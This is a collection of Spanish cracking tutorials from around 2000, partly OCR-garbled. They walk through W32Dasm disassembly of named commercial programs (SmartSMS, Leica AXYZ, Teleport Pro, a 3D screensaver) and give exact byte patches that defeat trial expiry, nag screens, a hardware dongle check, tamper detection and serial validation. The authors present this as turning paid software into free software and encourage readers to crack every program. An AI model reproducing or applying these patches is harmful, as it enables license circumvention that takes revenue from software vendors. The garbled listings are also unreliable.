:0041C403 8B8D78FEFFFF mov ecx, dword ptr 
[ebp+FFFFFE78] 

:0041C409 8B5178 mov edx, dword ptr [ecx+78] 
:0041C40C 52 push edx 


* Possible StringData Ref from Data Ob] -—"Your 
Trial version has expired!" 

| 

:0041C40D 680CEE4700 push 0047EE0OC 

:0041C412 6A00 push 00000000 

Bien tenenos dos menajes, a si que anularemos 
Los: -dos, -Mmitamos. nuestro: codigo," Yeso. JOJOGrrr;, 
es que nos lo dejan a huevo XD, esta diciendo 
a gritos, aqui estoyyy, Crackeameee. 

bien mirando el codigo primero vemos que en la 
linea 0041C3A1, tenemos un salto condicional 
que ummm, pero si se salta el mensaje bien 
tenemos la siguiente condicion: 

:0041C3A1 753A 3jne 0041C3DD 

Esto nos salta y nos anula la primera 
caducidad, pero solo si cumple la condicion, 
pues vamos a decirque que salte siempre, la 
cumpla o no, cambiamos: 

153A/ Por "EBSA==="y Listo 

Vamos a por la segunda que es igual: 
:0041C3E8 7445 j3e 0041C42F 

camiamos 7445 por EB45 --- y listo: 

Bueno, despues de esto ejecutamos el programa 
y vemos que aun nos sale una nag que nos dice 
que nos queda asta una fecha, JejeJ que 
ignorante, pero como no quiero molestias 
buscamos el codigo, buscamos en el W32Dasm: 
Your Trial 

y aparecemos es las dos anteriore, y... otra 
mas: 

* Reference To: gear. _pp_getvardatet 20 

| 

:0041C727 E858C60100 call 00438D84 

:0041C72C 8B85AOFEFFFF mov eax, dword ptr 
[ebp+FFFFFEAO ] 


:0041C732 50 push eax 

:0041C733 8B8DA4FEFFFF mov ecx, dword ptr 
[ebp+FEFFFFEAS] 

:0041C739 51 push ecx 

:0041C73A 8B9510FFFFFF mov edx, dword ptr 
[ebp+FFFFFFE10] 

:0041C740 52 push edx 


* Possible StringData Ref from Data Ob] -—"Your 
Trial version expires on " 

="%d/Sd/%d" 

| 

:0041C741 687CEE4700 push 0047EE7C 

:0041C746 8D85ACFEFFFF lea eax, dword ptr 
[ebp+FFFFFEAC] 

:0041C74C 50 push eax 

:0041C74D E846250200 call 0043EC98 

:0041C752 830414 add esp, 00000014 

:0041C755 6840200000 push 00002040 

:0041C75A 8B8D78FEFFFF mov ecx, dword ptr 
[ebp+FFFFFE78] 

:0041C760 8B5178 mov edx, dword ptr [ecx+78] 
:0041C763 52 push edx 

:0041C764 8D8DACFEFFFF lea eax, dword ptr 
[ebp+FFFFFEAC] 

:0041C76A 50 push eax 

:0041C76B 6A00 push 00000000 


* Reference To: USER32.MessageBoxA, Ord:01BEhR 
| 

:0041C76D FF15DC944600 Call dword ptr 
[004694DC] 

:0041C773 8B4DFO mov ecX, aword ptr [ebp=-10] 
:0041C776 51 push ecx 

* Reference To: gear. _pp lfclosek4 


:0041C777 E830C90100 call 004390AC 

:0041C77C 8B8D78FEFFFF mov ecx, dword ptr 
[ebp+FFFFFE78] 

:0041C782 E863BE0300 call 004585EA 

:0041C787 C745DC01000000 mov [ebp-24], 
00000001 

:0041C78E 8B55DC mov edx, dword ptr [ebp-24] 
:0041C791 8915DC214800 mov dword ptr 
[004821DC], edx 

:0041C797 C645FCO6 mov [ebp-04], 06 
:0041C79B 8D8D98SFEFFFF lea ecx, dword ptr 
[ebp+FFFFFE98] 

:0041C7A1 E84B600000 call 004227F1 

Ahora mira mos el codigo, ya que hemos 
encontrado el texto que queriamos, tras 
estudiar lo que hace, vemos que antes de 
mandar la nag, tiene valiras llamadas, a si qeu 
pienso... no voy a perder tiempo que ya llevo 
4 minutos, y me estoy pasando para una mierda 
de Crack XDiu2.. 

voy directamente a la linea que me muestra la 
ventana: 

* Reference To: USER32.MessageBoxA, Ord: 01BEhR 
| 

:0041C76D FF15DC944600 Call dword ptr 
[004694DC] 

:0041C7'73 8B4DF0O mov ecx, dword ptr [ebp-10] 
:0041C776 51 push ecx 

aqui la tenemos, quien sera... Seraaaa, bien 
en la direccion 0041C76D, tenemos un Call que 
llama a MessageBoxA, Jejeje te pille: 
cambiamos FF15DC944600 por un nopeo 
909090909090, y ya no llama a esta funcion. 
Bueno pues ya tenemos el programa operativo, 


ahora a copiar juegos de la play, XD aunque 
pensandolo bien... si yo no teongo play Xd, 
jejeje bueno pero ha sido divertido 5 
minutillos y listo XD. 

Saludos a todos TINT/WKT Cracker “DeeJay” 


SmartSMsS 1.0 


Proteccion: Shareware 10 dias 
Descripcion para mandar logos y tonos a telefonos 
NOKIA 


Atake: Evitar que Caduque 
Herramientas: Win32Dasm8.93, HexWorshop 


Cracker: *DeeJay” 12/04/2000 


Donwload (descargar programa ) 


INTRODUCCION 


TIEMPO INVERTIDO:15 minutos 

Ojeando un CD, he visto un programa para mandar 
logos, y tonos, a los telefonos NOKIA, algo que 
puede ser muy divertido XD, los logos pueden ser en 
formato GIF,NOL,etc, tiene bastante variedad, y me 
propuse estudiar el programa. 

como son las 12:36 de la noche, no tengo muchas 
ganas de buscar un numero de serie, a si que vamos 
a usar la fuerza bruta. 


AL ATAKERRR 


.ake: 

no queremos sacar el numero de serie pasamos de regitrarnos, lo 
10Ss es poner directamente la fecha un par de meses mas tarde, jJej 
aastara para caducar el programa. 

ij Atencion has caducado jejejej, vemos el siguiente mensajito: 


valuation period is over, register now 
) pues vamos a registernon now XD..... 
ws el W32Dasm, y buscamos la cadena "the evaluation", y llegamos 


ssible StringData Ref from Code Ob3 -"The evaluation period is ov 
jister now?" 


BB66 C78574FFFFFF908B4000 mov dword ptr [ebp+FFFFFF74], 00408B90 
BB70 C7856CFFFFFFO8000000 mov dword ptr [ebp+FFFFFF6C], 00000008 
JBBY7A 8D9D6CEFFFFFF lea edx, dword ptr [ebp+EEFFFEFF6C] 

JBB80 8D4DAC lea ecx, dword ptr [ebp-54] 


) si seguimos para arriba vemos un salto: 

BB17 0F845B070000 je 0043C278 

no es lo que nos interesa, lo que queremos es que no estre en es 
jO, ya que aqui lo que hace es comprobar el timpo y el registro a 
seguimos subiendo y llegamos a la condicion que buscamos: 
erenced by a (U)nconditional or (C)onditional Jump at Address: 
13B34D (C) 


Ímos Shif+12 en el W32Dasm y ponemos esa direccion, llegamos a es 
JO: 


serence To: MSVBVM60._ vbaFreeVarList, Ord:0000h 


3B33B FF152C104000 Call dword ptr [0040102C] 

3B341 83C40C€ add esp, 0000000C 

3B344 OFBF8520FFFFFF movsx eax, word ptr [ebp+FEFEFFFEF20] 

3B34B 85C0 test eax, eax 

3B34D 0F845B070000 je 0043BAAE 

3B353 C745FC18000000 mov [ebp-04], 00000018 

B35A C7458404000280 mov [ebp-7C], 80020004 

3B361 C7857CFFFFFFOAO00000 mov dword ptr [ebp+FEFFFFF7C], 0000000A 
B36B C7459404000280 mov [ebp-6C], 80020004 

3B372 C7458C0A000000 mov [ebp-74], 0000000A 


ssible StringData Ref from Code Ob3 -—"Register?" 


3B379 C78564FFFFFF788B4000 mov dword ptr [ebp+FEFFFFF64], 00408B78 
3B383 C71855CFFFFFFO8000000 mov dword ptr [ebp+FFFFFF5C], 00000008 
B38D 8D95D5CEFFFFFF lea edx, dword ptr [ebp+EFEFFFEFFIC] 

3B393 8D4D9C lea ecx, dword ptr [ebp-64] 


erence To: MSVBVM60.__ vbaVarDup, Ord:0000h 


3B396 FF15A8114000 Call dword ptr [00401148] 


ssible StringData Ref from Code Ob3 -"The computer clock has been 
jed " 
kwards! Register now?" 


) pues aqui tenemos nuestro salto :0043B34D 0F845B070000 j3Je 0043B 
.Nnamos el salto cambiando 0F845B070000 por 0F855B070000 

ahora vemos que nos sale el mensaje que tenemos mas abajo, el de 
-Oomputer clock has been changed 


que llegamos a la conclusion que tiene tenemos que hacer que 
JcO llegue a este codigo, subimos para ver que condicion nos pide 


erenced by a (U)nconditional or (C)onditional Jump at Address: 
I[3A9DF (C) 

¿MOS Shitt+rFl25 Y COdLÍO ió 

A9DF 0F84D4080000 je 0043B2B9 

A9ES C745FC09000000 mov [ebp-04], 00000009 

A9JEC BA7C734000 mov edx, 0040737C 

JA9F1 8D4DC4 lea ecx, dword ptr [ebp-3C] 


erence To: MSVBVM60.__ vbaStrCopy, Ord:0000h 
sA9F4 FF1574114000 Call dword ptr [00401174] 
ssible StringData Ref from Code Ob3 -"RegName" 


m, esto me gusta mas, osa que si saltamos la linea 0043A9DF 
)14080000 Je 0043B2B9, entramos de lleno en el programa, Jejeje, p 


.amos 0F84D4080000 por 0F85D4080000 
si funciona, pues venga a mandar mensajes como locéts.. 


) espero que os lo paseis pipa con este programa como veis no es 
cil, aunque para los que empezais, os resultará un poquitin lento 


los a todos INT/WKT Cracker “DeeJay” 


LEICA AXYZ 1.3.0 


Proteccion: .Motxila 

Descripcion SOFTWARE MEDIDOR DE PIEZAS 3D POR 
LASER 

Herramientas: Win32Dasm8.93 


Cracker: *DeeJay” 12/04/2000 


INTRODUCCION 


TIEMPO INVERTIDO:30 SEGUNDOS 


Pues nada cumpliendo un favor para un amiguete, 
me trajo un progama, que tras explicarme el tipo 
de protección, me pareció muy interesante el 
estudio, cual fue mi sorpresa, cuando vi la 
MIERDA DE PROTECCION, que tenia, apenas 30 
segundos y ya estaba operatiba, JejeJjeje, un 
programa de 400.000 pelas, con una proteccion tan 
indignante, no se como se gastan el dinero en 
este tipo de protecciones, si luego no valen para 
nada, es mas facil que un numero de serie. 


AL ATAKERRRRRRR 


Primer contacto: 

Pues nada instalamos el programa y ejecutamos el 
fichero AXYZ.EXE, y ¡¡¡¡01111PppPPPi¡iii 

AXYZ copy protection problem, Unit no found 

Bueno no tenia tiempo pero quise hechar un vistazo al 
programilla, ejecuto el W32DASM, y busco la cadena 
que me sale, llegamos hasta este codigo... 


* Referenced by a (U)nconditional or 
(C)onditional Jump at Address: 
|:0040B839 (U) 

| 

*0040B83D':85C9 test: ecX, (ec0x 
:0040B83F 898F14010000 mov dword ptr 
[edi+00000114], ecx 

:0040B845 747C Je 0040B8C3 

:0040B847 E8A4250900 call 0049DDFO 
:0040B84C 85C0 test eax, eax 
:0040B84E 0F85EA000000 jne 0040B93E 


* Possible Reference to String Resource 
ID=50562: "AXYZ Copy Protection Problem 


:0040B854 6882C50000 push 0000C582 
:0040B859 8D4DC8 lea ecx, dword ptr [ebp-38] 


* Reference To: MFC42.0Ordinal:1040, Ord:1040h 


:0040B85C E8ED180A00 Call 004AD14E 


* Possible Reference to String Resource 
ID=500503%. "Unit; mot. found" 


:0040B861 6847C50000 push 0000C547 
:0040B866 8D4DC4 lea ecx, dword ptr [ebp-3C] 


Joder, que facil, si seguimos el primer salto 
en la linea 0040B845, vemos que no nos lleva a 
ningun sitio, estudiamos la segunda y bingo 
tiene chicha, luego tenemos que obligar a que 
salte, ya que ese es el salto que ejecuta 
cuando tenemos la mochila... 

y direis... como sabe que hay comprueba la 
mochila ??, pues fasil, por que en el proximo 
codigo, vereis que comprueba si la motchila 
que hay puesta es la correcta. 

Bien el primer paso es hacer que salte cuando 
no tenga la mochila, tenemos que Cambiar el 
JNE por un JE, ¿como?, pues asl: 

Abrimos el Editor HEX, y buscamos el offíset, 
despues cambiamos: 

0F85EA000000 por 0F84EA000000 y listo. 

Bien una vez hecho esto pasamos al segundo 
codigo el que nos comprueba que es la buena, 
si no cambiamos el codigo, nos saldra un 
mensaje diciendo que la mochila no es la 
correcta, a si que manos a la obra. 
ejecutamos el salto y llegamos al cogigo: 


* Referenced by a (U)nconditional or 
(C)onditional Jump at Address: 
|:0040B84E (C) 

| 

:0040B93E 8B8Fr14010000 mov ecx, dword ptr 
[edi+00000114] 

:0040B944 6A00 push 00000000 

:0040B946 6A08 push 00000008 

:0040B948 E8A3250900 call 0049DEFO 


:0040B94D 85C0 test eax, eax 
:0040B94F 7513 3ne 0040B964 

:0040B951 6AFF push FEFFEFFEF 
:0040B953 6A10 push 00000010 


* Possible Reference to String Resource 
ED=0LO073< “"COpy PEObection.ertor: 
Module not enabled !" 


:0040B955 6831040000 push 00000431 


como veis esta chupado, solo hay que modificar el 

salto de la direccion 0040B94F, para que siempre lea 

que es la correcta. 

Editamos y buscamos el offset, despues cambiamos: 
7513 por EB13 


Como veis mas facil imposible. 

Bueno, lo unico que se le ocurre a nuestro 
programador es crear varios ejecutables y 
meterles el codigo a algunos XD, Jejeje, anda que 
se ha roto la cabeza..... 

Los ejecutables que pongo a continuacion son los 
que tienen la proteccion, no os pongo el codigo 
por que es exactamente igual en todos XD, para 
que gastar teclas, Jejejeje, lo unico que teneis 
que hacer es buscar el texto, y seguir los pasos 
anteriores. 

AXYZ .EXE 

IDM.EXE 

NIVEL.EXE 

REFRACT.EXE 

THEOMAN. EXE 

VM.EXE 

Bueno me da un poco de verguenza publicar un 


crack tan sumamente facil, pero asi veis que no 
todo lo que reluce es oro, no todas las 
protecciones son SHUNGAS, Jejeje XD. 

Con esto os animo a que intenteis desprotejer 
todos los programas sin que os tire atras una 
motx1ilalla,. -6 cualquier otra proteccion, 

Venga que lo disfruteis. Saludos a todos TINT/WKTI 


Cracker “DeeJay” 


Karpoff Spanish Tutor 


Teleport Pro 1.29 (build 976) 


Programa: 


PROTECCION: Nag Screen. 40 usos límite 


Descripcion: Guarda tus webs en el disco duro 
Dificultad: PR 


DOWNLOAD : 


http://members.xoom.com/aforrarse/pro12.exe 


Herramientas: W32Dasm8.93 £ Editor Hexadecimal 


CRACKER: CAPICUA FECHA: 21/04/2000 


| INTRODUCCION 


Imagínate que te compras una casa de 100 millones, qué medidas de seguridad pondrías?? Un candado??? 
En cambio imagínate una chabola, seguro que no vas a encontrar una alarma con rayos ultravioletas y 20 
guardias salvaguardando que no se meta ningún ladrón. 


Esta metáfora explica que si los programadores no se detienen en crear una buena seguridad anti-cracks es 
porque tal vez el programa no merezca la pena comprarlo de lo malo que sea. Hoy en día no hay ningún 
programa que no se puede crackear, paso a paso vamos a ir aprendiendo cómo hacerlo empezando de cero. 


Para el capítulo primero voy a explicar lo más claramente cómo se van a poder crackear la mayoría de los 
programas shareware de Internet. 


Nuestra primera víctima va a ser Teleport Pro 1.29 , un programa muy útil para descargarte al disco duro las 
webs que más te gusten, la seguridad de este programa va hacer que aprendamos bastante sobre lo más básico 
del crackeo. 


Bájate la versión exacta del programa desde http://members.xoom.com/aforrarse/pro12.exe 


AL ATAKE | 


Cómo en la mayoría de crackeos, vamos a utilizar los el desamblador “W32dasm y el editor 
hexagesimal HexWorkShop. 


Una vez que tenemos el ejecutable Teleport Pro en nuestras manos, observamos algo que nos 
extraña. Teleport Pro tienen siempre el ejecutable de nombre Pro.exe, si le cambiamos el 
nombre por ejemplo por Tele.exe , fijaos que nos dice 


This program's name has been changed..... es decir, que o lo dejas como estaba o no te deja 
entrar... la verdad es que tienen mala leche, que desconfiados son...aunque hacen bien porque 
hay cada cual por el mundo que no hay que fiarse... (:=))) 


Bueno pues a la mierda con el cartelito y de paso aprendemos, ejecutamos el W32dasm y abrimos 
tele.exe (haz una copia para después modificarlo con el Workshop). Una vez ya nos sale todo el 
código ASM le damos al botón String References y buscamos el famoso cartelito y hacemos doble 
click en él. Siempre hay que asegurarse que el cartel no nos lleve a más de un lugar, para 
ello haz varias veces en el mensaje y asegurate de que así sea. 


Bueno, aparecemos en 


:0040B92D 59 pop ecx 

:0040B92E 50 push eax 

:0040B92F E80C990200 call 00435240 

:0040B934 59 pop ecx 

:0040B935 85C0 test eax, eax 

:0040B937 59 pop ecx 

:0040B938 7414 je 0040B94E ----- >interesante 
:0040B93A 53 push ebx 

:0040B93B 53 push ebx 


* Possible StringData Ref from Data Obj ->"This program's name has been changed; " 
->"please rename the program to its " 

->"original name." 

| 

:0040B93C 684CD74700 push 0047D74C 

:0040B941 E828070400 call 0044C06E 

:0040B946 6A02 push 00000002 

:0040B948 E8431£0200 call 0042D790 

:0040B94D 59 pop ecx 


Miramos por encima del mensaje y vemos que en 0040B92F hace una llamada para darle a eax el 
valor de 0 si el nombre del programa es pro.exe y uno diferente de 0 si no es pro.exe. Cómo 
nosotros entramos por tele.exe entonces eax no es 0 y en la línea 0040B938 vemos un salto 
condicional ( je ) que dice que si eax es 0 saltemos, es decir, si el nombre del programa es 
pro.exe, que no nos muestre el mensajito, entendéis? 


Bueno, pues estaréis diciendo, claro, lo único que he de hacer es que se produzca ese salto 
siempre. Muy bien, lo único que tenemos que hacer es cambiar el salto condicional por uno 
incondicional ( jmp) para que el programa siempre se salta el cartelito y nos deje pasar. Otra 
forma sería cambiar el salto condicional JN por uno JNE, eso haría el proceso contrario, es 
decir, que cuando el nombre sea pro.exe, te saldrá el cartelito y no te dejará pasar, y cuando 
no lo sea, te dará puerta abierta. 

Yo os invito que hagáis 2 copias del programa y probéis la dos posibilades para comprobar que 
funciona. 


Ahora tal vez si acabáis de empezar con el crackeo os estaréis preguntado, bueno, ya sé qué 
hacer, pero cómo lo hago?? 


Pues para eso se inventaron los editores hexagesimales. Primero selecciona en el W32dasm la 
línea donde da el salto, verás que se pone de color verde. Mira a la barra de estado, en la 
parte inferior de la pantalla, y verás que pone 

Offset 0000AD38h , pues tenéis que apuntaros lo que hay entre los ceros y la h. 


Ahora ejecutad el Workshop y abrid una copia del programa para modificarlo y a través del menú 
Goto poniendo que se trata de caracteres Hex debési de poner lo que os apuntasteis, AD38. 
Ahora aparecéis en 7414 que son los 2 bytes del salto, lo siguiente es fácil: 


74.. indica que es un salto JE 
75.. para los saltos JNE 

EB.. para los saltos incondicionales JMP 

90.. para eliminar el byte y que no se produzca ningún salto. 


Bueno, pues como explicabamos antes, puedes cambiar el 74 por 75 o por EB, prúeba los dos para 
aprender más. 


Guardamos los cambios ,esto sin duda debería dejarnos entrar con Tele.exe, entramos y 
SORPRESA, otro mensajito!!!! 


La verdad es que ya empezamos a cabrearnos un poco, pero a la vez con más ganas de acabar el 
trabajo bien hecho. 
El mensaje es el siguiente: 


This program has been altered---> así que se ha dado cuenta de que le estamos operando vivo y 
se resiste un poco, pero ningún problema, ahora ya sabemos cargarnos el mensajito, no??, vamos 
allá. 


Buscamos en el W32dasm el texto y aparecemos en 


:0040B98B A1E4D64700 mov eax, dword ptr [0047D6E4] 
:0040B990 3B30 cmp esi, dword ptr [eax] 

:0040B992 7414 Je 0040B9A8 ----- >interesante 
:0040B994 53 push ebx 

:0040B995 53 push ebx 


* Possible StringData Ref from Data Obj ->"This program has been altered, " 
-=>"possibly by a virus; program execution " 

-=>"will stop now." 

:0040B996 68F4D64700 push 0047D6F4 

:0040B99B E8CE060400 call 0044C06E 


Ningún problema hacemos lo mismo que antes(espero que no tengáis problemas). Guardamos los 
cambios en el editor hex y vamos a ver si a valido la pena... 


Funciona!!!! Ahora ya sabemos una manera de cargarnos los mensajitos de los programas con 
seguridad cutre. 

Pero no creo que hayamos llegado para aquíi sólo para querer cambiarle el nombre de pro.exe a 
tele.exe, no, hemos venido a pasar el programa de Shareware a Freeware que es la principal 
finalidad de los crackers. 


Entramos al programa y vemos que se trata de un programa que sólo te deja usarlo 40 veces y 
con limitaciones, si te registras puedes utilizarlo en su totalidad, pues vamos a registrarnos 
pero con dinero del Monopoly P:))) 

Nos vamos al apartado Registrar y ponemos el nombre de tu abuela(con el de tu perro también 
funciona), la compañía Cutre, y como Code pones tu DNI a ver si hay suerte y cuela....... 


Nos aparece otro mensajito de los chulos: 


We're sorry, the registration number you have entered appears to be invalid----> Que no, que 
no funciona, bueno, pues nos cargamos el mensajito como ya sabemos. 


Lo buscamos en el W32dasm y intentamos buscar algún mensaje que diga lo contrario, es decir, 
que gracias por registranos. 
Buscamos un poco y encima del anterior encontramos 


:0042574B BECOE84700 mov esi, 0047E8C0 

:00425750 0F840B010000 je 00425861 

:00425756 FFB7D5000000 push dword ptr [edi+000000D5] 
:0042575C E894090000 call 004260F5 

:00425761 3945EC cmp dword ptr [ebp-14], eax 
:00425764 59 pop ecx 

:00425765 753A jne 004257A1 ----- > interesante 
:00425767 8D4DF0O lea ecx, dword ptr [ebp-10] 
:0042576A E81FF20100 call 0044498E 


* Possible Reference to String Resource ID=07030: "Thank you! Your copy of Teleport Pro is now 
registered. Al" 

| 

:0042576F 68761B0000 push 00001B76 

:00425774 8D4DF0O lea ecx, dword ptr [ebp-10] 

:00425777 895DFC mov dword ptr [ebp-04], ebx 

:0042577A E8A1F80100 call 00445020 


Vemos que por encima del mensaje, en 00425765 realiza un salto condicional que se salta el 
mensaje y por tanto no estaremos registrado, pues hay que conseguir que no salte, como.. 


74.. indica que es un salto JE 
75.. para los saltos JNE 

EB.. para los saltos incondicionales JMP 

90.. para eliminar el byte y que no se produzca ningún salto. 


sólo tenemos que cambiar el 753A por 743A o por 9090 para eliminar los dos bytes que forma el 
salto y hacer que no se produzca. 


Optaremos por la segunda forma, vemos la dirección en la barra de estado y la encontramos en 
el editor hexagesimal donde hacemos los cambios( a estas alturas no creo que os equivoquéis). 
Guardamos los datos y probamos. 


Ponemos un registro cualquiera y ALELUYA, nos da las gracias por registrarnos, y se quitan las 
limitaciones. Ahora ya podemos utilizar el programa como Freeware, pero hay que ver si el 
registro se guarda para la próxima vez que entremos. 


Salimos del programa y volvemos a entrar, sorpresa, nos sale la asquerosa pantalla al 
principio de que a los 40 usos a la piuta calle, esto se debe a que al empezar el programa 
realiza otra comprobación de nuestro código y ve que es incorrecto y nos vuelve a adoptar como 
no registrados. Bueno, pues fácil, como siempre, fijémonos en los mensajes del cartelito. 


"Sorry! The free evaluation period for Teleport Pro is limit" 


Buscamos en el W32dasm y vemos que este mensaje aparece en 2 lugares distintos :00412893 y 
0041CcC6C , Vemos que encima de los dos hay un salto condicional del tipo JE que debes conseguir 
que se produzca para saltarnos los mensajes, así que pasamos los 74 por EB. 
Guardamos..Y....ESTUPENDO, ya estamos registrados para siempre. 


Todavía falta una cosa, si nos damos cuenta, en el Menú ABOUT nos dice que el periodo de 
prueba ha caducado ----> The free evaluation period for Teleport Pro has expired. 


Bueno, pues aunque ya estemos registrados merece la pena quitar este mensaje que dice que no 


lo estamos. 


Buscamos el texto y en :00415A7E 7435 je 00415AB5 hemos de cambiar el je por jmp, si nos fijamos 
un poco más vemos que este salto nos lleva al mensaje This copy of Teleport Pro is 
UNREGISTERED, por tanto hay que pasar a a jmp el salto de :00415ABB 7435 je 00415AF2 


Después de realizar esto, lo probamos y nos queda perfecto. Se ve que una vez te enseñas lo 
principal, lo demás ya te sale solito. Este capítulo no obstante es el más fácil. Cuando ya 
tengamos experiencia sabremos como crear patches y como, mediante el Softlce, poder extraer 
los números de serie sin necesidad de crackear el programa entero. Pero ahora sientete 
satisfecho de conocer lo básico. 


He de dar las gracias a Karpoff por su web a partir de la cual he podido aprender esto, la 
verdad es que yo no sé mucho más de crackear, con el tiempo aprenderé poco a poco, porque la 
verdad es que después de estar 3 horas para hacer este capítulo, uno está un poco cansado, tú 


no? 77 


Comentarios y correciones a capicuaOteleline.es 


Karpoff Spanish Tutor: Pagina dedicada a la dibulgacion de informacion en Castellano, sobre 


Ingenieria Inversa y Programacion. Email "Colabora con tus Proyectos" 


Karpoff Spanish Tutor 


Programa: 3D LIQUID DESKTOP SCREENSAVER 


PROTECCION: Numero de Serie 

Descripcion: Es un Agradable Screensaver que convierte las imágenes de tu monitor en apariencia de agua 
Dificultad: principiante 

DOWNLOAD : http:/ / www.public.iastate.edu/ —jaybebe/ screen_saver.htm 
Herramientas: win32dasm v 8.93 y hexworkshop 

CRACKER: PrfEsOr X | FECHA: 21/04/99 


INTRODUCCION | 
Bueno amigos este 


screensaver, que para mi tiene una protección demasiado fácil, y viendo que hay pocos tutoriales que hablen 
sobre screensavers bueno, pues me avente a escribir esta Torta ..........] ))...estoy seguro que mi amigo 
Skuater si que se hubiera reído bastante de esta protección, por cierto saludo a todos los que me han escrito 
con sus dudas, saludos también a mOtriX “¡!! ahí la llevas compa ¡!!!, espero que me sigan escribiendo para 
que en lo que pueda ayudarlos ADELANTE...... Empezaremos diciendo que podría ocupar dos formas de 
atacar este screensaver, como seria la de buscar un serial valido o parchear la rutina de comprobación del 
serial, ya que mi primer tutorial lo explique con el primer método que es buscando un serial, ahora vamos a 
ocupar la segunda opción que es la de parchear el o los saltos donde se comprueba nuestro serial con el 
valido. 


| AL ATAKE 


Ahora lo primero que haremos será instalar el programa 3d liquid desktop el cual desde este momento 
le llamaremos “3D”, como pueden ver el 3D no viene con un programa de instalación, solo viene el 
3d.scr y un readme con lo que todos los programadores dicen, **”” esta es una versión 
shareware...instálalo en ...bla!!bla!!bla... *”””, ok una vez descomprimido, sácale una copia y ábrela en 
el cualquier editor hexadecimal en mi caso usare el hex work shop 3.1, una vez abierta la copia en la 
cual harás los cambios pertinentes, ahora abre el 3d original con el ws32dasm y ahí es donde empieza 
la acción ¡¡COMO SE DICE EN MIPAIS¡!! ¡!!! A LO QUE TE TRAJE CHENCHA ¡!!!!!. 


66999> 


, bueno 


Pues nada de nada, creo que ¡! ESTOS PROGRAMADORES ME QUIEREN HACER DE CHIVO 
LOS TAMALES!!!!, no aparece ningún string que haga referencia a invalid code, mmm que haremos 
entonces por donde atacar.?, a ya se veamos el principio del código desensamblado!!! 


Aquí parece que hay algo interesante ¡!!! 


Mame: DialogID_00€6C, $ of Controls=002, Caption: "Registration", ClassName:""” 

001 - ControlID:0001, Control Class: "BUTTON" Control Text: "OK" 

002 - ControlID:FFFF, Control Class: "STATIC" Control Text: "Registration Successful Thank you." 
Name: DialogID_006D, $ of Controls=003, Caption: "Registration", ClassName:"" 

001 - ControlID:0002, Control Class: "BUTTON" Control Text: "OK" 


003 - ControlID:FFFF, Control Class: "STATIC" Control Text: "Note: You must enter the exact sane informatic 
Mame: DialogID_006E, $ of Controls=002, Caption: "Message", ClassName:"* 
001 - ControlID:0001, Control Class: "BUTTON" Control Text: "OK" 


pues si amigos aquí hay algo muy interesante resaltado en azul , les parece familiar?, bueno pues como 
ven aquí aparece un strig ahora lo que debemos buscar es adonde se encuentra la parte del código que 
manda a llamar este string!!, y como TIA CLETA vamos y buscamos esa parte de código, bueno pues 
muy fácil ¡!! Fíjense bien ustedes en la línea donde se encuentra el string REGISTRATION CODE 
INVALID” YA ¡!! Al principio de la línea vemos un string que dice : 


Name: DialogID_00€6D, $ of Controls=003, Caption: "Registration", ClassName:"" 
Not - Pantera Th-NANT7 Pramtrval Plare=- "DITTTORT" Pranterral Tarte- "AT" 


entonces nos vamos a [>] en DASM e insertamos lo siguiente DialogID_006D y le damos a buscar 
siguiente, y nos manda directamente a la parte del código que estábamos buscando: 


* Referenced by a (Ujnconditional or (Cjonditional Jump at Addresses: 
1:00404614(C), :00404628/C), :004046361/C), :00404647(C) 
| 


:0040469B SBODSSFE4100 mov ecx, dword ptr [0041FE58] 

:00404641 6400 push 00000000 

:00404643 6830444000 push 00404430 

100404648 56 push esi 

* Possible Reference to Dialog: DialogID_008D 
l 

:00404649 6A6D push 0000006Db 

:004046A4B 51 push ecx 


como vemos en la imagen esta parte del código es la que nos mostrará el mensaje de error, esta 
referenciada a varios saltos condicionales en 404614, 404628, 404636 y 404647 , bueno ahora nos falta 


analizar esas referencias, vamos a la primera que es la 404614 para eso damos clic en (el e insertamos 
404614 y nos manda a el salto condicional : 


D040460F 83C40C add esp, 0000000c 
00404612 34co0 test al, al 
D040461A 8D7C242C lea edi, dvord ptr [esp+2C] 


DO040461E S3C9FF or ecx, FFFFFFFF 


01£8481000000 je 0040469B bueno pues ahora tenemos el salto que nos manda al mensaje de error, 
ahora apuntemos el offset el cual nos servirá para modificarlo en el editor exadecimal 


que es 4614 recordemos que los 0000 y la h no se ponen, ahora nos vamos al editor Hexadecimal el 
cual lo tenemos abierto con la copia y damos CRTL G y aparecera la ventana donde pondremos ese 
offset: 


00004600|518D 8424 DODO 0000 5250 E891 2400|0..5....RP..S$. 
0000460E|0083 C40C 84C0 0F84 8100 0000 8D7C|............. | 


que es 0F8481000000 lo cambiamos por 0F8581000000 esto quiere decir si el salto condicional es JE 
lo cambiamos por un JNE , en castellano quiere decir : 


JE= JUMP EQUAL (SALTA SI ES IGUAL) 
JNE= JUMP NO EQUAL (SALTA SI NO ES IGUAL) 


damos salvar y probamos a ver si nos funciona , vamos al programa, nos metemos a la opción de 
configurar, register => insertamos un nombre, un correo electrónico y un numero de serie cualquiera , 
damos ok ¡!!!! Y salimos del screensaver y volvemos a entrar yyYyyYYYYYYYYy yyy??? 


66999> 6699999> 


Ya ven que fácil es petar (esa palabra se la he escuchado mencionar a MI AMIGO Karpoff ) 
bueno ya lo petamos el programa, y listo. 


Pd: favor de mandarme sus sugerencias, comentarios, dudas o si la regué en la explicación , ya que 
recuerden que no soy un maestro del cracking solo soy un aprendiz mas, ¡! JAJA :::::) ami correo 
electrónico que es profesor_x Ghotmail.com ya que sus email me dan animos para seguir escribiendo estos 
tutoriales, que por cierto vaya que si son difícil , .... 


SALUDOS A TODOS ¡!!!! 
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Programa: WALLPAPER PRO V.2.0 


PROTECCION: Limitacion de usos, Nag 


Descripcion: Programa Grafico para manipular y crear fondos 
Dificultad: Principiante 
DOWNLOAD : http://winfiles.cnet.com/apps/98/shelldesk.html 


Herramientas: W32dasm, Hiew 
CRACKER: Loco FECHA: 12/07/2000 


| INTRODUCCION 


Hola amiguitos. Este es mi primer tutorial y vamos a investigar las tripas del 
programa Wallpaper Pro v. 2.0, el cual nos permite poner de fondo diversas imágenes, 
con períodos de tiempo personalizados, soporte para varios formatos de archivos 
gráficos, básicas funciones de edición de imágenes, y alguna otra cosilla que otra. 
En resumen, un programita muy majo, y que ocupa poco. 


Yo no es que sea un as de la ingeniería inversa (jo, cómo suena), soy un newbie, oO 
aprendiz, pero la protección de este programa es tan fácil, que no he podido resistir 
la tentación de explicároslo. 


AL ATAKE 


El programa nos presenta una nag screen nada más empezar, en la que nos indica el número 
máximo de veces que lo podemos usar, y las que llevamos. 


Dos cosillas: 


